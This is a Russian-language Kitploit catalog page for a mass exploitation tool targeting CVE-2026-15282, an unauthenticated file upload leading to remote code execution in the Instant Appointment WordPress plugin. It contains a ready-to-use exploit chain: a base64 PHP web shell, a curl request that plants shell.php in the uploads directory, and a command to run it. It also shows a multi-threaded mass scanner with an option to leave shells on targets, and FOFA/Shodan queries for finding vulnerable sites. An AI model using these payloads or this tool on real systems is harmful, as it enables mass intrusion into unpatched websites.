Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-15282 — Instant Appointment <= 1.2 — Неаутентифицированная произвольная загрузка файла, приводящая к RCE, через AJAX-функцию add_service_front | CVSS 9.8 | Kitploit
Инструменты/GitHubGitHub/shinthink/cve-2026-15282
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubshinthink/cve-2026-15282

CVE-2026-15282

Instant Appointment <= 1.2 — Неаутентифицированная произвольная загрузка файла, приводящая к RCE, через AJAX-функцию add_service_front | CVSS 9.8

Репозиторий
1 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-15282 — Массовый эксплойт RCE для Instant Appointment

Доаутентификационное file_get_contents() + file_put_contents() → PHP-оболочка


Обзор

CVE-2026-15282 — это критическая (CVSS 9.8) неаутентифицированная уязвимость произвольной загрузки файлов в плагине Instant Appointment для WordPress (≤ 1.2).

AJAX-действие add_service_front зарегистрировано через wp_ajax_nopriv_ для доступа без аутентификации. Обработчик передаёт предоставленные пользователем image_url и image_name напрямую в file_get_contents() и file_put_contents() без какой-либо проверки типа файла или расширения.

Уязвимые версии

ВерсияСтатус
≤ 1.2Уязвим
> 1.2Патча нет — удалите плагин

Механизм уязвимости

Корневая причина

root@kitploit:~
// ajax_services.php
function insapp_upload_image_as_attachment($image_url, $file_name, $product_id) {
    $image_data = file_get_contents($image_url);       // downloads from ANY URL
    $file = $upload_dir['path'] . '/' . $file_name;    // uses attacker's filename
    file_put_contents($file, $image_data);             // no extension check!
}

AJAX-обработчик принимает любой image_url (включая URI data://) и записывает любой image_name напрямую в директорию загрузок WordPress.

Схема атаки

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=add_service_front
  image_url=data://text/plain;base64,PD9waHAgc3lzdGVt...
  image_name=think_xxx.php
→ PHP-оболочка записана в wp-content/uploads/YYYY/MM/think_xxx.php
→ RCE через https://target.com/wp-content/uploads/YYYY/MM/think_xxx.php?c=id

Установка

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-15282.git
cd CVE-2026-15282
pip install -r requirements.txt

Использование

root@kitploit:~
python cve_2026_15282.py -t target.com
python cve_2026_15282.py -f targets.txt -o shells.txt
python cve_2026_15282.py -t target.com --debug
python cve_2026_15282.py -t target.com --no-cleanup

Аргументы

root@kitploit:~
  -t, --target      Одиночная цель
  -f, --file        Список целей
  -o, --output      Сохранить URL-адреса RCE в файл
  --threads         Количество потоков (по умолчанию: 25)
  --no-cleanup      Оставить оболочки на цели
  --debug           Показывать каждый запрос
  -v, --verbose     Подробный вывод

Доказательство концепции

Одиночная цель

root@kitploit:~
$ python cve_2026_15282.py -t target.com
root@kitploit:~
  ⠋ Scanning target...  →  OK Scanning target...

  Host       : target.com
  Plugin     : YES
  Upload     : YES
  RCE        : YES
  Shell      : https://target.com/wp-content/uploads/2026/07/think_a1b2c3.php?c=id
  Output     : uid=33(www-data) gid=33(www-data)

Массовое сканирование

root@kitploit:~
  [.] current-target.com | ⠋ [████░░░░░░░░░░░░░] 45/500 (9%) Plugin:12 UP:3 RCE:1
  [RCE] target.com   https://target.com/wp-content/uploads/2026/07/think_xxx.php

Ручная эксплуатация

root@kitploit:~
# 1. Создать PHP-оболочку в base64
echo '<?php system($_GET["c"]); ?>' | base64 -w0

# 2. Загрузить через AJAX
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=add_service_front' \
  -d 'service_name=test' \
  -d 'image_url=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==' \
  -d 'image_name=shell.php' \
  -d 'image_size=100' \
  -d 'image_type=image/jpeg' \
  -d 'service_price_sale=1' \
  -d 'service_price_reg=1' \
  -d 'service_category[]=1' \
  -d 'service_duration=60' \
  -d 'service_author=1'

# 3. Доступ к оболочке
curl -sk 'https://target.com/wp-content/uploads/2026/07/shell.php?c=id'

FOFA / Shodan

root@kitploit:~
FOFA:   body="wp-content/plugins/instant-appointment"
Shodan: http.html:"instant-appointment"

Отказ от ответственности

ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И АВТОРИЗОВАННЫХ ТЕСТОВЫХ ЦЕЛЕЙ.


Ссылки

РесурсСсылка
WPScan

Не аффилирован с tenteeglobal или Instant Appointment.

Скачать инструмент
wpscan.com/vulnerability/b3457e95
Wordfencewordfence.com
NVDCVE-2026-15282
ИсследовательRandom Robbie (What Security)